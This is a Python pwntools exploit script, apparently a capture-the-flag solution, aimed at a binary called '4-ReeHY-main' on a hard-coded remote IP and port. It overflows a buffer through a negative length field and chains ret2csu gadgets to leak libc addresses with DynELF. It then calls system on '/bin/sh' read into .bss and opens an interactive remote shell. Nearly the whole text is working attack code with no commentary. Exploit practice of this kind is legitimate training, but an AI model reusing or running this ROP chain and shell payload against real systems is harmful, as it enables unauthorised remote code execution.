import pwn
import traceback
e = pwn.ELF(
'4-ReeHY-main'
)
write_len = 0x200
write_got = e.got[
"write"
]
memcpy_got = e.got[
"memcpy"
]
read_got = e.got[
"read"
]
gadget1 = 0x00400D9A
gadget2 = 0x00400D80
s = pwn.remote(
'211.159.216.90'
, 51888)
r = s.recvuntil(
'\n'
)
print (r)
s.send(
"lcys"
)
r = s.recvlines(10)
for
row in r:
print(row)
s.send(
"1"
)
r = s.recvuntil(
'\n'
)
print(r)
vulfun_addr = 0x004009D1
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):
payload = pwn.p64(part1) # part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret
payload += pwn.p64(0x0) # rbx be 0x0
payload += pwn.p64(0x1) # rbp be 0x1
payload += pwn.p64(jmp2) # r12 jump to
payload += pwn.p64(arg3) # r13 -> rdx arg3
payload += pwn.p64(arg2) # r14 -> rsi arg2
payload += pwn.p64(arg1) # r15 -> edi arg1
payload += pwn.p64(part2) # part2 entry will call [rbx + r12 + 0x8]
payload +=
'A'
* 56 # junk
return
payload
def leak(address):
pay =
"A"
* (0x90 - 8)
pay += pwn.p64(0x0)
pay +=
"A"
* 8
# call
memcpy
pay += com_gadget(gadget1, gadget2, memcpy_got, 0x006020AC, 0x00400A9C, 0x1)
# call write
pay += com_gadget(gadget1, gadget2, write_got, 0x1, address, write_len)
pay += pwn.p64(vulfun_addr)
paylen =
"-%d"
% len(pay)
pay_head = paylen
pay_head +=
"\0"
* (0xA - len(paylen))
pay_head +=
"1"
pay_head +=
"\0"
* 9
payload = pay_head + pay
try
:
s.send(payload)
print(len(payload))
r = s.recvuntil(
"content\n"
)
buf = s.recv(write_len)
data = buf[:write_len]
pwn.
log
.info(
"%#x => %s"
% (address, (data or
''
).encode(
'hex'
)))
except:
traceback.print_exc()
print (
"%#x"
% address)
exit
(0)
return
data
d = pwn.DynELF(leak, elf=e)
system_addr = d.lookup(
'system'
,
'libc.so'
)
print
"system_addr="
+ hex(system_addr)
bssaddr = 0x00602080
pop_rdi = 0x00400da3
sh_addr = system_addr
sh =
"/bin/sh\0"
pay =
"A"
* (0x90 - 8)
pay += pwn.p64(0x0)
pay +=
"A"
* 8
# call read
pay += com_gadget(gadget1, gadget2, read_got, 0x0, bssaddr, len(sh))
pay += pwn.p64(pop_rdi)
pay += pwn.p64(bssaddr)
pay += pwn.p64(system_addr)
paylen =
"-%d"
% len(pay)
pay_head = paylen
pay_head +=
"\0"
* (0xA - len(paylen))
pay_head +=
"1"
pay_head +=
"\0"
* 9
s.send(pay_head + pay)
s.send(sh)
s.interactive()